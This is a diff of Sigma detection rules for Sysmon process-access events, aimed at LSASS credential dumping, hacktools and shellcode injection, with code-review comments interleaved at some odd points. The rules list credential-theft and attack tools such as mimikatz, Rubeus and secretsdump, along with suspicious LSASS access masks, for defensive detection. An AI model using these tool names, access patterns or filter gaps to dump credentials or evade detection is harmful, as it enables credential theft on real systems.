- - \getST_windows.exe
- - \getTGT_windows.exe
- - \GetUserSPNs_windows.exe
- - \gmer.exe
- - \hashcat.exe
- - \htran.exe
- - \ifmap_windows.exe
- - \impersonate.exe
- - \Inveigh.exe
- - \LocalPotato.exe
- - \mimikatz_windows.exe
- - \mimikatz.exe
- - \netview_windows.exe
- - \nmapAnswerMachine_windows.exe
- - \opdump_windows.exe
- - \PasswordDump.exe
- - \Potato.exe
- - \PowerTool.exe
- - \PowerTool64.exe
- - \psexec_windows.exe
- - \PurpleSharp.exe
- - \pypykatz.exe
- - \QuarksPwDump.exe
- - \rdp_check_windows.exe
- - \Rubeus.exe
- - \SafetyKatz.exe
- - \sambaPipe_windows.exe
- - \SelectMyParent.exe
- - \SharpChisel.exe
- - \SharPersist.exe
- - \SharpEvtMute.exe
- - \SharpImpersonation.exe
- - \SharpLDAPmonitor.exe
- - \SharpLdapWhoami.exe
- - \SharpUp.exe
- - \SharpView.exe
- - \smbclient_windows.exe
- - \smbserver_windows.exe
- - \sniff_windows.exe
- - \sniffer_windows.exe
- - \split_windows.exe
- - \SpoolSample.exe
- - \Stracciatella.exe
- - \SysmonEOP.exe
- - \temp\rot.exe
- - \ticketer_windows.exe
- - \TruffleSnout.exe
- - \winPEASany_ofs.exe
- - \winPEASany.exe
- - \winPEASx64_ofs.exe
- - \winPEASx64.exe
- - \winPEASx86_ofs.exe
- - \winPEASx86.exe
- - \xordump.exe
- - SourceImage|contains:
- - \goldenPac
- - \just_dce_
- - \karmaSMB
- - \kintercept
- - \LocalPotato
- - \ntlmrelayx
- - \rpcdump
- - \samrdump
- - \secretsdump
- - \smbexec
- - \smbrelayx
- - \wmiexec
- - \wmipersist
- - HotPotato
- - Juicy Potato
- - JuicyPotato
- - PetitPotam
- - RottenPotato
+ - SourceImage|endswith:
+ - \Akagi.exe
+ - \Akagi64.exe
+ - 
\atexec_windows.exe
+ - \Certify.exe
+ - \Certipy.exe
+ - \CoercedPotato.exe
+ - \crackmapexec.exe
+ - \CreateMiniDump.exe
+ - \dcomexec_windows.exe
+ - \dpapi_windows.exe
+ - \findDelegation_windows.exe
+ - \GetADUsers_windows.exe
+ - \GetNPUsers_windows.exe
+ - \getPac_windows.exe
+ - \getST_windows.exe
+ - \getTGT_windows.exe
+ - \GetUserSPNs_windows.exe
+ - \gmer.exe
+ - \hashcat.exe
+ - \htran.exe
+ - \ifmap_windows.exe
+ - \impersonate.exe
+ - \Inveigh.exe
+ - \LocalPotato.exe
+ - \mimikatz_windows.exe
+ - \mimikatz.exe
+ - \netview_windows.exe
+ - \nmapAnswerMachine_windows.exe
+ - \opdump_windows.exe
+ - \PasswordDump.exe
+ - \Potato.exe
+ - \PowerTool.exe
+ - \PowerTool64.exe
+ - \psexec_windows.exe
+ - \PurpleSharp.exe
+ - \pypykatz.exe
+ - \QuarksPwDump.exe
+ - \rdp_check_windows.exe
+ - \Rubeus.exe
+ - \SafetyKatz.exe
+ - \sambaPipe_windows.exe
+ - \SelectMyParent.exe
+ - \SharpChisel.exe
+ - \SharPersist.exe
+ - \SharpEvtMute.exe
+ - \SharpImpersonation.exe
+ - \SharpLDAPmonitor.exe
+ - \SharpLdapWhoami.exe
+ - \SharpUp.exe
+ - \SharpView.exe
+ - \smbclient_windows.exe
+ - \smbserver_windows.exe
+ - \sniff_windows.exe
+ - \sniffer_windows.exe
+ - \split_windows.exe
+ - \SpoolSample.exe
+ - \Stracciatella.exe
+ - \SysmonEOP.exe
+ - \temp\rot.exe
+ - \ticketer_windows.exe
+ - \TruffleSnout.exe
+ - \winPEASany_ofs.exe
+ - \winPEASany.exe
+ - \winPEASx64_ofs.exe
+ - \winPEASx64.exe
+ - \winPEASx86_ofs.exe
+ - \winPEASx86.exe
+ - \xordump.exe
+ - SourceImage|contains:
+ - \goldenPac
+ - \just_dce_
+ - \karmaSMB
+ - \kintercept
+ - \LocalPotato
+ - \ntlmrelayx
+ - \rpcdump
+ - \samrdump
+ - \secretsdump
+ - \smbexec
+ - \smbrelayx
+ - \wmiexec
+ - \wmipersist
+ - HotPotato
+ - Juicy Potato
+ - JuicyPotato
+ - PetitPotam
+ - RottenPotato
condition: process_access and selection
falsepositives:
- Unlikely
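Review bot: In the re-indented selection, `SourceImage|contains: \LocalPotato` already matches every image that `SourceImage|endswith: \LocalPotato.exe` matches, so the `endswith` entry is redundant and can be dropped to keep the two lists from drifting apart. The hunk is otherwise a pure re-indentation of the existing OR-list and does not change what the rule matches. The rule header and the `process_access` selector lie outside this hunk.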
diff --git a/sigma/sysmon/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml b/sigma/sysmon/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml
index cdeec0f44..22ae0165f 100644
--- a/sigma/sysmon/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml
+++ b/sigma/sysmon/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml
@@ -1,8 +1,7 @@
title: HackTool - HandleKatz Duplicating LSASS Handle
id: b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5
status: test
-description: Detects HandleKatz opening LSASS to duplicate its handle to later dump
- the memory without opening any new handles
+description: Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
references:
- https://github.com/codewhitesec/HandleKatz
author: Bhabesh Raj (rule), @thefLinkk
@@ -22,8 +21,9 @@ detection:
EventID: 10
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- TargetImage|endswith: \lsass.exe
- GrantedAccess: '0x1440'
+ TargetImage|endswith: \lsass.exe # Theoretically, can be any benign process holding handle to LSASS
+ GrantedAccess: '0x1440' # Only PROCESS_DUP_HANDLE, PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_QUERY_INFORMATION
+ # Example: C:\Windows\SYSTEM32\ntdll.dll+9d234\|UNKNOWN(00000000001C119B)
CallTrace|startswith: C:\Windows\System32\ntdll.dll+
CallTrace|contains: '|UNKNOWN('
CallTrace|endswith: )
diff --git a/sigma/sysmon/process_access/proc_access_win_hktl_sysmonente.yml b/sigma/sysmon/process_access/proc_access_win_hktl_sysmonente.yml
index 1a995e81d..c26f1d36e 100644
--- a/sigma/sysmon/process_access/proc_access_win_hktl_sysmonente.yml
+++ b/sigma/sysmon/process_access/proc_access_win_hktl_sysmonente.yml
@@ -36,8 +36,7 @@ detection:
filter_main_msdefender:
SourceImage|contains: :\ProgramData\Microsoft\Windows Defender\Platform\
SourceImage|endswith: \MsMpEng.exe
- condition: process_access and (( selection_sysmon and not 1 of filter_main_* )
- or selection_calltrace)
+ condition: process_access and (( selection_sysmon and not 1 of filter_main_* ) or selection_calltrace)
falsepositives:
- Unknown
level: high
diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml b/sigma/sysmon/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml
index f0dade521..05ce20b02 100644
--- a/sigma/sysmon/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml
+++ b/sigma/sysmon/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml
@@ -1,8 +1,7 @@
title: Lsass Memory Dump via Comsvcs DLL
id: a49fa4d5-11db-418c-8473-1e014a8dd462
status: test
-description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll
- via rundll32 to perform a memory dump from lsass.
+description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
references:
- https://twitter.com/shantanukhande/status/1229348874298388484
- https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_dump_keyword_image.yml b/sigma/sysmon/process_access/proc_access_win_lsass_dump_keyword_image.yml
index f2fdfd09d..28ba5ebe4 100644
--- a/sigma/sysmon/process_access/proc_access_win_lsass_dump_keyword_image.yml
+++ b/sigma/sysmon/process_access/proc_access_win_lsass_dump_keyword_image.yml
@@ -1,8 +1,7 @@
title: LSASS Memory Access by Tool With Dump Keyword In Name
id: 9bd012ee-0dff-44d7-84a0-aa698cfd87a3
status: test
-description: Detects LSASS process access requests from a source process with the
- "dump" keyword in its image name.
+description: Detects LSASS process access requests from a source process with the "dump" keyword in its image name.
references:
- https://twitter.com/_xpn_/status/1491557187168178176
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
@@ -49,7 +48,7 @@ detection:
- BA
- DA
- FA
- - '0x14C2'
+ - '0x14C2' # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c
- FF
condition: process_access and selection
falsepositives:
diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_memdump.yml b/sigma/sysmon/process_access/proc_access_win_lsass_memdump.yml
index 27dd3815f..1165d24e2 100644
--- a/sigma/sysmon/process_access/proc_access_win_lsass_memdump.yml
+++ b/sigma/sysmon/process_access/proc_access_win_lsass_memdump.yml
@@ -1,13 +1,9 @@
title: Potential Credential Dumping Activity Via LSASS
id: 5ef9853e-4d0e-4a70-846f-a9ca37d876da
status: experimental
-description: 'Detects process access requests to the LSASS process with specific call
- trace calls and access masks.
-
- This behaviour is expressed by many credential dumping tools such as Mimikatz,
- NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
-
- '
+description: |
+ Detects process access requests to the LSASS process with specific call trace calls and access masks.
+ This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
references:
- https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html
- https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
@@ -35,7 +31,12 @@ detection:
- '0x1038'
- '0x1438'
- '0x143a'
- - '0x1fffff'
+ - '0x1fffff' # Too many false positives
+ # - '0x01000' # Too many false positives
+ # - '0x1010' # Too many false positives
+ # - '0x1400' # Too many false positives
+ # - '0x1410' # Too many false positives
+ # - '0x40' # Too many false positives
CallTrace|contains:
- dbgcore.dll
- dbghelp.dll
@@ -43,7 +44,7 @@ detection:
- kernelbase.dll
- ntdll.dll
filter_main_system_user:
- SourceUser|contains:
+ SourceUser|contains: # Covers many language settings
- AUTHORI
- AUTORI
filter_optional_thor:
@@ -54,8 +55,7 @@ detection:
GrantedAccess: '0x103800'
filter_optional_sysmon:
SourceImage|endswith: :\Windows\Sysmon64.exe
- condition: process_access and (selection and not 1 of filter_main_* and not 1
- of filter_optional_*)
+ condition: process_access and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
falsepositives:
- Unknown
level: medium
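Review bot: The still-active `- '0x1fffff' # Too many false positives` line carries the same comment as the five masks that were commented out right below it, which leaves the reader unable to tell whether `0x1fffff` was meant to stay in `GrantedAccess|endswith` or to be disabled like the others. If it is intentionally kept, the comment should say so, e.g. `- '0x1fffff' # Kept; the masks commented out below were dropped for false-positive volume`; if it is not, it should be commented out consistently with its neighbours. The `SourceUser|contains: # Covers many language settings` comment is a useful note and needs no change. The `selection` block that holds these masks starts above this hunk.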
diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_python_based_tool.yml b/sigma/sysmon/process_access/proc_access_win_lsass_python_based_tool.yml
index a32c62960..4cb157c2b 100644
--- a/sigma/sysmon/process_access/proc_access_win_lsass_python_based_tool.yml
+++ b/sigma/sysmon/process_access/proc_access_win_lsass_python_based_tool.yml
@@ -1,13 +1,12 @@
title: Credential Dumping Activity By Python Based Tool
id: f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9
related:
- - id: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0
- type: obsoletes
- - id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b
- type: obsoletes
+ - id: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0
+ type: obsoletes
+ - id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b
+ type: obsoletes
status: stable
-description: Detects LSASS process access for potential credential dumping by a Python-like
- tool such as LaZagne or Pypykatz.
+description: Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.
references:
- https://twitter.com/bh4b3sh/status/1303674603819081728
- https://github.com/skelsec/pypykatz
diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml b/sigma/sysmon/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml
index ffc45dca4..a3f563474 100644
--- a/sigma/sysmon/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml
+++ b/sigma/sysmon/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml
@@ -1,8 +1,7 @@
title: Remote LSASS Process Access Through Windows Remote Management
id: aa35a627-33fb-4d04-a165-d33b4afca3e8
status: stable
-description: Detects remote access to the LSASS process via WinRM. This could be a
- sign of credential dumping from tools like mimikatz.
+description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
references:
- https://pentestlab.blog/2018/05/15/lateral-movement-winrm/
author: Patryk Prauze - ING Tech
diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_seclogon_access.yml b/sigma/sysmon/process_access/proc_access_win_lsass_seclogon_access.yml
index 45a81725e..d6086df03 100644
--- a/sigma/sysmon/process_access/proc_access_win_lsass_seclogon_access.yml
+++ b/sigma/sysmon/process_access/proc_access_win_lsass_seclogon_access.yml
@@ -1,14 +1,12 @@
title: Suspicious LSASS Access Via MalSecLogon
id: 472159c5-31b9-4f56-b794-b766faa8b0a7
status: test
-description: Detects suspicious access to LSASS handle via a call trace to "seclogon.dll"
- with a suspicious access right.
+description: Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right.
references:
- https://twitter.com/SBousseaden/status/1541920424635912196
- https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml
- https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html
-author: Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (Nextron
- Systems)
+author: Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (Nextron Systems)
date: 2022/06/29
tags:
- attack.credential_access
diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_susp_access_flag.yml b/sigma/sysmon/process_access/proc_access_win_lsass_susp_access_flag.yml
index 7faeda008..f27613bab 100644
--- a/sigma/sysmon/process_access/proc_access_win_lsass_susp_access_flag.yml
+++ b/sigma/sysmon/process_access/proc_access_win_lsass_susp_access_flag.yml
@@ -1,20 +1,17 @@
title: Potentially Suspicious GrantedAccess Flags On LSASS
id: a18dd26b-6450-46de-8c91-9659150cf088
related:
- - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d
- type: similar
+ - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d
+ type: similar
status: experimental
-description: Detects process access requests to LSASS process with potentially suspicious
- access flags
+description: Detects process access requests to LSASS process with potentially suspicious access flags
references:
- https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
- https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow
- https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
- http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
-author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas
- Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov,
- oscd.community
+author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community
date: 2021/11/22
modified: 2023/11/29
tags:
@@ -32,42 +29,48 @@ detection:
selection_target:
TargetImage|endswith: \lsass.exe
selection_access:
- - GrantedAccess|endswith:
- - '30'
- - '50'
- - '70'
- - '90'
- - B0
- - D0
- - F0
- - '18'
- - '38'
- - '58'
- - '78'
- - '98'
- - B8
- - D8
- - F8
- - 1A
- - 3A
- - 5A
- - 7A
- - 9A
- - BA
- - DA
- - FA
- - '0x14C2'
- - GrantedAccess|startswith:
- - '0x100000'
- - '0x1418'
- - '0x1438'
- - '0x143a'
- - '0x1f0fff'
- - '0x1f1fff'
- - '0x1f2fff'
- - '0x1f3fff'
- - '0x40'
+ - GrantedAccess|endswith:
+ # - '10' # covered in rule 678dfc63-fefb-47a5-a04c-26bcf8cc9f65
+ - '30'
+ - '50'
+ - '70'
+ - '90'
+ - B0
+ - D0
+ - F0
+ - '18'
+ - '38'
+ - '58'
+ - '78'
+ - '98'
+ - B8
+ - D8
+ - F8
+ - 1A
+ - 3A
+ - 5A
+ - 7A
+ - 9A
+ - BA
+ - DA
+ - FA
+ - '0x14C2' # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c
+ - GrantedAccess|startswith:
+ - '0x100000'
+ - '0x1418' # car.2019-04-004
+ - '0x1438' # car.2019-04-004
+ - '0x143a' # car.2019-04-004
+ - '0x1f0fff'
+ - '0x1f1fff'
+ - '0x1f2fff'
+ - '0x1f3fff'
+ - '0x40'
+ # - '0x1000' # minimum access requirements to query basic info from service
+ # - '0x1010' # car.2019-04-004
+ # - '0x1400'
+ # - '0x1410' # car.2019-04-004 # Covered by 678dfc63-fefb-47a5-a04c-26bcf8cc9f65
filter_main_generic:
+ # When using this rule. Remove this filter and replace it by the path of the specific AV you use
SourceImage|contains:
- :\Program Files (x86)\
- :\Program Files\
@@ -120,8 +123,7 @@ detection:
GrantedAccess: '0x401'
filter_optional_steam_apps:
SourceImage|contains: \SteamLibrary\steamapps\
- condition: process_access and (all of selection_* and not 1 of filter_main_* and
- not 1 of filter_optional_*)
+ condition: process_access and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*)
falsepositives:
- Legitimate software such as AV and EDR
level: medium
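Review bot: The new comment above `filter_main_generic` is written as two fragments (`When using this rule. Remove this filter ...`) and understates why the advice matters: as shipped, the filter suppresses every event whose `SourceImage` falls under `:\Program Files (x86)\` or `:\Program Files\`, so the rule only reaches its intended sensitivity once that generic exclusion is replaced. Suggested wording: `# Before deploying this rule, replace this generic exclusion with the install paths of the AV/EDR products actually in use; as written it suppresses any source image under Program Files`. The `# - '10'` and `# - '0x1410'` cross-references to 678dfc63-fefb-47a5-a04c-26bcf8cc9f65 are consistent with each other and read fine. The remainder of `filter_main_generic` continues past this hunk.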
diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_werfault.yml b/sigma/sysmon/process_access/proc_access_win_lsass_werfault.yml
index e4c87abd6..226cf14bf 100644
--- a/sigma/sysmon/process_access/proc_access_win_lsass_werfault.yml
+++ b/sigma/sysmon/process_access/proc_access_win_lsass_werfault.yml
@@ -1,9 +1,7 @@
title: Credential Dumping Attempt Via WerFault
id: e5b33f7d-eb93-48b6-9851-09e1e610b6d7
status: test
-description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz,
- Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll
- or dbgcore.dll for win10, server2016 and up.
+description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.
references:
- https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507
author: Florian Roth (Nextron Systems)
diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_whitelisted_process_names.yml b/sigma/sysmon/process_access/proc_access_win_lsass_whitelisted_process_names.yml
index 334394515..f095a7ffc 100644
--- a/sigma/sysmon/process_access/proc_access_win_lsass_whitelisted_process_names.yml
+++ b/sigma/sysmon/process_access/proc_access_win_lsass_whitelisted_process_names.yml
@@ -1,11 +1,8 @@
title: LSASS Access From Potentially White-Listed Processes
id: 4be8b654-0c01-4c9d-a10c-6b28467fc651
status: test
-description: 'Detects a possible process memory dump that uses a white-listed filename
- like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft
- Defender interference
-
- '
+description: |
+ Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
references:
- https://twitter.com/_xpn_/status/1491557187168178176
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
@@ -28,9 +25,9 @@ detection:
selection:
TargetImage|endswith: \lsass.exe
SourceImage|endswith:
- - \TrolleyExpress.exe
- - \ProcessDump.exe
- - \dump64.exe
+ - \TrolleyExpress.exe # Citrix
+ - \ProcessDump.exe # Cisco Jabber
+ - \dump64.exe # Visual Studio
GrantedAccess|endswith:
- '10'
- '30'
@@ -56,7 +53,7 @@ detection:
- BA
- DA
- FA
- - '0x14C2'
+ - '0x14C2' # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c
- FF
condition: process_access and selection
falsepositives:
diff --git a/sigma/sysmon/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml b/sigma/sysmon/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml
index 561fc2430..5a570c9eb 100644
--- a/sigma/sysmon/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml
+++ b/sigma/sysmon/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml
@@ -24,6 +24,7 @@ detection:
TargetImage|endswith: vcredist_x64.exe
SourceImage|endswith: vcredist_x64.exe
filter_main_generic:
+ # Examples include "systeminfo", "backgroundTaskHost", "AUDIODG"
SourceImage|contains:
- :\Program Files (x86)\
- :\Program Files\
@@ -37,23 +38,24 @@ detection:
- :\Windows\SysWOW64\
- :\Windows\WinSxS\
filter_main_kerneltrace_edge:
+ # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider
Provider_Name: Microsoft-Windows-Kernel-Audit-API-Calls
filter_optional_vmware:
TargetImage|endswith: :\Windows\system32\systeminfo.exe
- SourceImage|endswith: setup64.exe
+ SourceImage|endswith: setup64.exe # vmware
filter_optional_cylance:
SourceImage|endswith: :\Windows\Explorer.EXE
TargetImage|endswith: :\Program Files\Cylance\Desktop\CylanceUI.exe
filter_optional_amazon:
SourceImage|endswith: AmazonSSMAgentSetup.exe
TargetImage|endswith: AmazonSSMAgentSetup.exe
- filter_optional_vscode:
+ filter_optional_vscode: # VsCode
SourceImage|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe
TargetImage|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe
- filter_optional_teams:
+ filter_optional_teams: # MS Teams
TargetImage|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe
SourceImage|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe
- filter_optional_discord:
+ filter_optional_discord: # Discord
TargetImage|contains: \AppData\Local\Discord\
TargetImage|endswith: \Discord.exe
filter_optional_yammer:
@@ -69,8 +71,7 @@ detection:
SourceImage|endswith: \AcroCEF.exe
TargetImage|contains: :\Program Files\Adobe\Acrobat DC\Acrobat\
TargetImage|endswith: \AcroCEF.exe
- condition: process_access and (selection and not 1 of filter_main_* and not 1
- of filter_optional_*)
+ condition: process_access and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
falsepositives:
- Unknown
level: medium
diff --git a/sigma/sysmon/process_access/proc_access_win_susp_invoke_patchingapi.yml b/sigma/sysmon/process_access/proc_access_win_susp_invoke_patchingapi.yml
index 98122495b..eeb6fc851 100644
--- a/sigma/sysmon/process_access/proc_access_win_susp_invoke_patchingapi.yml
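Review bot: `SourceImage|endswith: setup64.exe # vmware` keeps a suffix match with no path separator, so any image whose file name merely ends in `setup64.exe` satisfies the VMware exclusion, not only the installer the comment names. Tightening it to `SourceImage|endswith: \setup64.exe` (or anchoring on the installer's directory, if that is known) keeps `filter_optional_vmware` scoped to the case it documents; the `AmazonSSMAgentSetup.exe` pair in `filter_optional_amazon` and the `vcredist_x64.exe` pair in the previous hunk have the same shape, though those lines are not changed here. The rule's `selection` and the start of `filter_main_generic` lie above this hunk.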
+++ b/sigma/sysmon/process_access/proc_access_win_susp_invoke_patchingapi.yml
@@ -25,16 +25,17 @@ detection:
CallTrace|contains: '|UNKNOWN('
CallTrace|endswith: )
filter_main_generic:
- - SourceImage|contains:
- - :\Program Files\
- - :\Program Files (x86)\
- - :\Windows\System32\
- - :\Windows\SysWOW64\
- - TargetImage|contains:
- - :\Program Files\
- - :\Program Files (x86)\
- - :\Windows\System32\
- - :\Windows\SysWOW64\
+ # To avoid FP with installed applications. This filter assumes that if an application is located here. The attacker has already achieved admin rights
+ - SourceImage|contains:
+ - :\Program Files\
+ - :\Program Files (x86)\
+ - :\Windows\System32\
+ - :\Windows\SysWOW64\
+ - TargetImage|contains:
+ - :\Program Files\
+ - :\Program Files (x86)\
+ - :\Windows\System32\
+ - :\Windows\SysWOW64\
filter_optional_thor:
SourceImage|endswith:
- \thor.exe
@@ -69,8 +70,7 @@ detection:
filter_optional_teams_update_to_teams:
SourceImage|endswith: \AppData\Local\Microsoft\Teams\Update.exe
TargetImage|endswith: \AppData\Local\Microsoft\Teams\stage\Teams.exe
- condition: process_access and (selection and not 1 of filter_main_* and not 1
- of filter_optional_*)
+ condition: process_access and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
falsepositives:
- Unknown
level: medium
diff --git a/sigma/sysmon/process_access/proc_access_win_susp_shellcode_injection.yml b/sigma/sysmon/process_access/proc_access_win_susp_shellcode_injection.yml
index 2f27745da..7f9e2b5dc 100644
--- a/sigma/sysmon/process_access/proc_access_win_susp_shellcode_injection.yml
+++ b/sigma/sysmon/process_access/proc_access_win_susp_shellcode_injection.yml
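Review bot: The new comment above `filter_main_generic` is a sentence fragment and does not describe what the filter actually does: the two entries are list items, so a `SourceImage` OR a `TargetImage` under any of the four roots is enough to suppress the event, which means an access whose target is a `:\Windows\System32\`-hosted process is excluded regardless of where the source image lives. If the intent is only to drop installed-application false positives, the `TargetImage` branch looks broader than that intent and should either be narrowed or have the gap stated. Suggested wording: `# Suppress FPs from installed applications. Assumes that placing a binary under these roots already required admin rights; note that a matching TargetImage alone also suppresses the event`. The enclosing `selection` starts above this hunk.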
@@ -1,8 +1,7 @@
title: Potential Shellcode Injection
id: 250ae82f-736e-4844-a68b-0b5e8cc887da
status: test
-description: Detects potential shellcode injection used by tools such as Metasploit's
- migrate and Empire's psinject
+description: Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject
author: Bhabesh Raj
date: 2022/03/11
modified: 2023/11/29
@@ -24,6 +23,19 @@ detection:
- '0x1f3fff'
CallTrace|contains: UNKNOWN
filter_optional_dell_folders:
+ # If dell software is installed we get matches like these
+ # Example 1:
+ # SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
+ # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
+ # GrantedAccess: 0x1F3FFF
+ # Example 2:
+ # SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe
+ # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
+ # GrantedAccess: 0x1F3FFF
+ # Example 3:
+ # SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
+ # TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe
+ # GrantedAccess: 0x1F3FFF
SourceImage|contains:
- :\Program Files\Dell\
- :\Program Files (x86)\Dell\
diff --git a/sigma/sysmon/process_access/proc_access_win_svchost_credential_dumping.yml b/sigma/sysmon/process_access/proc_access_win_svchost_credential_dumping.yml
index 636e9e665..69be6d20c 100644
--- a/sigma/sysmon/process_access/proc_access_win_svchost_credential_dumping.yml
+++ b/sigma/sysmon/process_access/proc_access_win_svchost_credential_dumping.yml
@@ -1,8 +1,7 @@
title: Credential Dumping Attempt Via Svchost
id: 174afcfa-6e40-4ae9-af64-496546389294
status: test
-description: Detects when a process tries to access the memory of svchost to potentially
- dump credentials.
+description: Detects when a process tries to access the memory of svchost to potentially dump credentials.
references:
- Internal Research
author: Florent Labouyrie
diff --git a/sigma/sysmon/process_access/proc_access_win_svchost_susp_access_request.yml b/sigma/sysmon/process_access/proc_access_win_svchost_susp_access_request.yml
index 7669e7640..788bf3f2e 100644
--- a/sigma/sysmon/process_access/proc_access_win_svchost_susp_access_request.yml
+++ b/sigma/sysmon/process_access/proc_access_win_svchost_susp_access_request.yml
@@ -1,8 +1,7 @@
title: Suspicious Svchost Process Access
id: 166e9c50-8cd9-44af-815d-d1f0c0e90dde
status: test
-description: Detects suspicious access to the "svchost" process such as that used
- by Invoke-Phantom to kill the thread of the Windows event logging service.
+description: Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.
references:
- https://github.com/hlldz/Invoke-Phant0m
- https://twitter.com/timbmsft/status/900724491076214784
@@ -27,6 +26,7 @@ detection:
filter_main_msbuild:
SourceImage|contains: :\Program Files\Microsoft Visual Studio\
SourceImage|endswith: \MSBuild\Current\Bin\MSBuild.exe
+ # Just to make sure it's "really" .NET :)
CallTrace|contains:
- Microsoft.Build.ni.dll
- System.ni.dll
